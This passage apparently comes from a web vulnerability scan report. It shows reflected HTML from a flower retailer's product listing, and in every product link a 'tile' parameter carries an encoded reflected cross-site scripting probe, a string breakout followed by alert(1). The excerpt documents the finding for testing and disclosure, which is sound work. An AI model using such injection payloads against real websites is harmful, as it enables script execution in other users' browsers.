ree-Dozen-Long-Stemmed-Red-Roses-wFree-Ruby-Vase-40753?viewpos=21&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS36Red50_rbyg11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Three Dozen Long Stemmed Red Roses w/Free Ruby Vase" border="0" /></a>
...[SNIP]...
products.proflowers.com/flowers/Three-Dozen-Long-Stemmed-Red-Roses-wFree-Ruby-Vase-40753?viewpos=21&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
products.proflowers.com/flowers/Monets-Garden-30006156?viewpos=22&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewmonet_coralpeony11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Monet&#39;s Garden" border="0" /></a>
...[SNIP]...
itMVTFreeVase=false" href="http://products.proflowers.com/flowers/Monets-Garden-30006156?viewpos=22&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ucts.proflowers.com/lilies/Deluxe-Lilies-for-Mom-40699?viewpos=23&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Lilies for Mom" border="0" /></a>
...[SNIP]...
TFreeVase=false" href="http://products.proflowers.com/lilies/Deluxe-Lilies-for-Mom-40699?viewpos=23&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
products.proflowers.com/roses/One-Dozen-Red-Roses-4537?viewpos=24&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red40_rbye11_4_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="One Dozen Red Roses" border="0" /></a>
...[SNIP]...
itMVTFreeVase=false" href="http://products.proflowers.com/roses/One-Dozen-Red-Roses-4537?viewpos=24&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
//products.proflowers.com/flowers/Lavish-Freesia-43633?viewpos=25&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewtulfield10_3_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Lavish Freesia" border="0" /></a>
...[SNIP]...
exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Lavish-Freesia-43633?viewpos=25&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
/products.proflowers.com/flowers/Gerbera-Daisies-41216?viewpos=26&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Gerbera Daisies" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Gerbera-Daisies-41216?viewpos=26&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
http://products.proflowers.com/roses/Moms-Reward-41357?viewpos=27&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Mom&#39;s Reward" border="0" /></a>
...[SNIP]...
ick="exitMVTFreeVase=false" href="http://products.proflowers.com/roses/Moms-Reward-41357?viewpos=27&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
//products.proflowers.com/tulips/20-Tulips-for-Mom-426?viewpos=28&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="20 Tulips for Mom" border="0" /></a>
...[SNIP]...
exitMVTFreeVase=false" href="http://products.proflowers.com/tulips/20-Tulips-for-Mom-426?viewpos=28&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
cts.proflowers.com/flowers/Deluxe-All-the-Frills-43700?viewpos=29&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe All the Frills" border="0" /></a>
...[SNIP]...
FreeVase=false" href="http://products.proflowers.com/flowers/Deluxe-All-the-Frills-43700?viewpos=29&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
oducts.proflowers.com/flowers/Sunflower-Radiance-40369?viewpos=30&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Sunflower Radiance" border="0" /></a>
...[SNIP]...
MVTFreeVase=false" href="http://products.proflowers.com/flowers/Sunflower-Radiance-40369?viewpos=30&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
owers.com/roses/One-Dozen-Long-Stemmed-Pink-Roses-1016?viewpos=31&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12pink50_pnk11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="One Dozen Long Stemmed Pink Roses" border="0" /></a>
...[SNIP]...
false" href="http://products.proflowers.com/roses/One-Dozen-Long-Stemmed-Pink-Roses-1016?viewpos=31&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
oducts.proflowers.com/flowers/Mothers-Day-Orchid-41728?viewpos=32&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Mother...s Day Orchid" border="0" /></a>
...[SNIP]...
MVTFreeVase=false" href="http://products.proflowers.com/flowers/Mothers-Day-Orchid-41728?viewpos=32&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
s.proflowers.com/flowers/Mothers-Day-Spectacular-41213?viewpos=33&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Mother&#39;s Day Spectacular" border="0" /></a>
...[SNIP]...
eeVase=false" href="http://products.proflowers.com/flowers/Mothers-Day-Spectacular-41213?viewpos=33&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ducts.proflowers.com/flowers/Potted-Yellow-Roses-43183?viewpos=34&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Yellow Rose" border="0" /></a>
...[SNIP]...
VTFreeVase=false" href="http://products.proflowers.com/flowers/Potted-Yellow-Roses-43183?viewpos=34&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
/products.proflowers.com/lilies/100-Blooms-for-Mom-960?viewpos=35&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="100 Blooms for Mom" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/lilies/100-Blooms-for-Mom-960?viewpos=35&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
cts.proflowers.com/flowers/Deluxe-Hugs-and-Kisses-5519?viewpos=36&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Hugs and Kisses" border="0" /></a>
...[SNIP]...
FreeVase=false" href="http://products.proflowers.com/flowers/Deluxe-Hugs-and-Kisses-5519?viewpos=36&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
oflowers.com/plants/Potted-Pink-Calla-Lily-for-Mom-494?viewpos=37&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Pink Calla Lily for Mom" border="0" /></a>
...[SNIP]...
se=false" href="http://products.proflowers.com/plants/Potted-Pink-Calla-Lily-for-Mom-494?viewpos=37&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
cts.proflowers.com/flowers/Peace-Lily-for-Mom-30003768?viewpos=38&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inspath_HEGpinkpot11_PC1935_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Peace Lily for Mom" border="0" /></a>
...[SNIP]...
FreeVase=false" href="http://products.proflowers.com/flowers/Peace-Lily-for-Mom-30003768?viewpos=38&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
="http://products.proflowers.com/flowers/Super-Mom-435?viewpos=39&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Super Mom" border="0" /></a>
...[SNIP]...
click="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Super-Mom-435?viewpos=39&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
.proflowers.com/flowers/Deluxe-Spring-Awakenings-43067?viewpos=40&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxspgawk_tv11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Spring Awakenings" border="0" /></a>
...[SNIP]...
eVase=false" href="http://products.proflowers.com/flowers/Deluxe-Spring-Awakenings-43067?viewpos=40&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
flowers.com/pottedroses/Potted-Mothers-Day-Roses-41362?viewpos=41&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Mother&#39;s Day Roses" border="0" /></a>
...[SNIP]...
e=false" href="http://products.proflowers.com/pottedroses/Potted-Mothers-Day-Roses-41362?viewpos=41&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
om/plants/Potted-Double-Stem-Kaleidoscope-Orchid-12115?viewpos=42&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Double Stem Kaleidoscope Orchid" border="0" /></a>
...[SNIP]...
href="http://products.proflowers.com/plants/Potted-Double-Stem-Kaleidoscope-Orchid-12115?viewpos=42&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
s.proflowers.com/orchids/White-Dendrobium-Orchids-8071?viewpos=43&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15whtdendrbm09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="White Dendrobium Orchids" border="0" /></a>
...[SNIP]...
eeVase=false" href="http://products.proflowers.com/orchids/White-Dendrobium-Orchids-8071?viewpos=43&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
products.proflowers.com/roses/Two-Dozen-Red-Roses-1737?viewpos=44&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Two Dozen Red Roses" border="0" /></a>
...[SNIP]...
itMVTFreeVase=false" href="http://products.proflowers.com/roses/Two-Dozen-Red-Roses-1737?viewpos=44&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
proflowers.com/monthlyflowers/3-Months-of-Flowers-2202?viewpos=45&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="3 Months of Flowers" border="0" /></a>
...[SNIP]...
Vase=false" href="http://products.proflowers.com/monthlyflowers/3-Months-of-Flowers-2202?viewpos=45&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
oducts.proflowers.com/iris/Assorted-Iris-for-Mom-41209?viewpos=46&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Assorted Iris for Mom" border="0" /></a>
...[SNIP]...
MVTFreeVase=false" href="http://products.proflowers.com/iris/Assorted-Iris-for-Mom-41209?viewpos=46&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
cts.proflowers.com/flowers/Mothers-Day-Tradition-41215?viewpos=47&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Mother&#39;s Day Tradition " border="0" /></a>
...[SNIP]...
FreeVase=false" href="http://products.proflowers.com/flowers/Mothers-Day-Tradition-41215?viewpos=47&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
tp://products.proflowers.com/flowers/Purple-Petals-954?viewpos=48&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Purple Petals" border="0" /></a>
...[SNIP]...
k="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Purple-Petals-954?viewpos=48&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
/products.proflowers.com/tulips/30-Tulips-for-Mom-3669?viewpos=49&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="30 Tulips for Mom" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/tulips/30-Tulips-for-Mom-3669?viewpos=49&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
